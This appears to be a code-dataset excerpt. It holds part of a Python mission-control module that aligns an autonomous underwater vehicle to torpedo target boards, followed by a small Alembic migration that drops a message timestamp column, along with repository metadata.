AlignBoards(lambda: vision.boards, min_boards=2),
))
class IdentifyBoard(Task):
def on_run(self, vision, *args, **kwargs):
if sum(b is not None for b in vision.boards) > 0:
self.finish()
class AlignBoards(Task):
"""
Imprecisely align to both torpedoes boards.
Pre: at least one board in sight
Post: both boards centered in front of sub
"""
TARGET_WIDTH = 0.8
FOV = 30
def board_count(self, boards_func):
return sum(b is not None for b in boards_func())
def on_first_run(self, boards_func, min_boards=0, *args, **kwargs):
def avg_board(boards):
if len(boards) == 1:
return boards[0]
for i, b in enumerate(boards):
if b is not None:
avg_i = i
avg_b = copy.copy(b)
break
other_b = boards[1]
if avg_i == 0 and other_b is not None:
for attr in ['x', 'y', 'skew', 'width', 'height']:
setattr(
avg_b,
attr,
(getattr(avg_b, attr) + getattr(other_b, attr)) / 2,
)
return avg_b
def assert_boards():
return self.board_count(boards_func) >= min_boards
self.task = Retry(lambda: Sequential(
Log('Aligning boards'),
Concurrent(
AlignSurge(lambda: avg_board(boards_func()), self.TARGET_WIDTH),
AlignSkew(lambda: avg_board(boards_func())),
# Align heading
GradualHeading(lambda: shm.kalman.heading.get() + avg_board(boards_func()).x * self.FOV),
finite=False,
),
Zero(),
Conditional(
FunctionTask(assert_boards),
on_fail=Fail(Sequential(
Log('Less than {} boards aligned, backing up and retrying'.format(min_boards)),
MoveXRough(-0.25),
)),
),
), 2)
def on_run(self, boards_func, *args, **kwargs):
if self.board_count(boards_func) == 0:
self.loge('No boards visible, aborting align')
self.finish(success=False)
else:
self.task()
if self.task.finished:
self.finish(success=self.task.success)
class AlignSurge(Task):
DEADBAND = 0.03
P = 0.5
D = 0.2
MAX_OUT = 0.3
def on_first_run(self, board_func, width, *args, **kwargs):
""" PID our distance instead of the raw width since it's linear """
self.use_task(PIDLoop(
input_value=lambda: 1 / board_func().width,
output_function=VelocityX(),
target=lambda: 1 / call_if_function(width),
deadband=self.DEADBAND,
p=self.P,
d=self.D,
negate=True,
max_out=self.MAX_OUT,
))
class AlignSkew(Task):
def on_first_run(self, board_func, *args, **kwargs):
self.use_task(PIDLoop(
input_value=lambda: board_func().skew,
output_function=VelocityY(),
target=0,
deadband=0.1,
p=1.5,
d=0.5,
max_out=0.2,
))
class RestorePos(Task):
"""
Restore the position of the sub from before the given task started.
"""
def on_first_run(self, task, *args, **kwargs):
k = shm.kalman.get()
self.use_task(Defer(task, Sequential(
Log('Restoring position'),
NavigationSpeed(GoToPositionRough(
north=k.north,
east=k.east,
heading=k.heading,
depth=k.depth,
), 0.3),
Zero(),
)))
class AlignCutout(Task):
NORMAL_TARGET_BOARD_WIDTH = 2
NORMAL_TARGET_BOARD_HALF_WIDTH = 1 / ((
1 / NORMAL_TARGET_BOARD_WIDTH + 1 / AlignBoards.TARGET_WIDTH
) / 2)
SEAWEED_TARGET_BOARD_WIDTH = 1
ALIGN_POKER_DISTANCE = 0.63
def on_first_run(self, cutout, torp, *args, **kwargs):
def unsee_cutout():
self.must_see_cutout = False
self.must_see_cutout = True
def TargetCutout(deadband):
return ForwardTarget(
lambda: cutout.coord_func(),
(0, 0),
deadband=(deadband, deadband),
px=0.7,
py=0.5,
max_out=0.3,
)
def MoveClose(width, deadband):
return ConsistentTask(Concurrent(
TargetCutout(deadband),
AlignSurge(cutout.board_func, width),
finite=False,
), success=6, total=8)
if cutout.is_noodle:
target_cutout = Sequential(
Log('Aligning in front of covered cutout'),
MoveClose(self.SEAWEED_TARGET_BOARD_WIDTH, 0.04),
)
else:
target_cutout = Sequential(
Log('Aligning halfway to uncovered cutout'),
MoveClose(self.NORMAL_TARGET_BOARD_HALF_WIDTH, 0.07),
Log('Aligning close to uncovered cutout'),
MoveClose(self.NORMAL_TARGET_BOARD_WIDTH, 0.07),
)
self.task = Sequential(
Log('Aligning board containing cutout'),
AlignBoards(lambda: [cutout.board_func()]),
Log('Centering cutout'),
TargetCutout(0.15),
target_cutout,
Zero(),
FunctionTask(unsee_cutout),
Sequential(
Log('Moving poker beside seaweed'),
NavigationSpeed(
MoveX(self.ALIGN_POKER_DISTANCE, deadband=0.02),
0.3,
),
) if cutout.is_noodle else NoOp(),
Log('Aligning torpedo tube'),
torp.AlignFromForecam(),
)
def on_run(self, cutout, torp, *args, **kwargs):
if self.must_see_cutout and cutout.board_func() is None:
self.loge('Cutout lost, cannot align')
self.finish(success=False)
else:
self.task()
if self.task.finished:
self.finish(success=self.task.success)
class VisionTask(Task):
def on_first_run(self, task_func, *args, **kwargs):
vision = Vision()
self.use_task(MasterConcurrent(task_func(vision, *args, **kwargs), vision))
def Full(): return VisionTask(Torpedoes)
| 30.421951
| 105
| 0.570833
|
c4934d3dff4073a9d9c15e6c4f3428702f360f94
| 735
|
py
|
Python
|
migrations/versions/bc7876f81064_.py
|
hkjayakumar/ghost-server
|
5ecbf57e4c02fba2517161e36b0fb51410e5969b
|
[
"MIT"
] | 1
|
2020-10-17T23:42:32.000Z
|
2020-10-17T23:42:32.000Z
|
migrations/versions/bc7876f81064_.py
|
hkjayakumar/ghost-server
|
5ecbf57e4c02fba2517161e36b0fb51410e5969b
|
[
"MIT"
] | null | null | null |
migrations/versions/bc7876f81064_.py
|
hkjayakumar/ghost-server
|
5ecbf57e4c02fba2517161e36b0fb51410e5969b
|
[
"MIT"
] | null | null | null |
"""empty message
Revision ID: bc7876f81064
Revises: 891fd177041d
Create Date: 2017-08-08 00:21:23.137849
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = 'bc7876f81064'
down_revision = '891fd177041d'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('messages', 'timestamp')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('messages', sa.Column('timestamp', postgresql.TIMESTAMP(), autoincrement=False, nullable=True))
# ### end Alembic commands ###
| 25.344828
| 113
| 0.715646
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.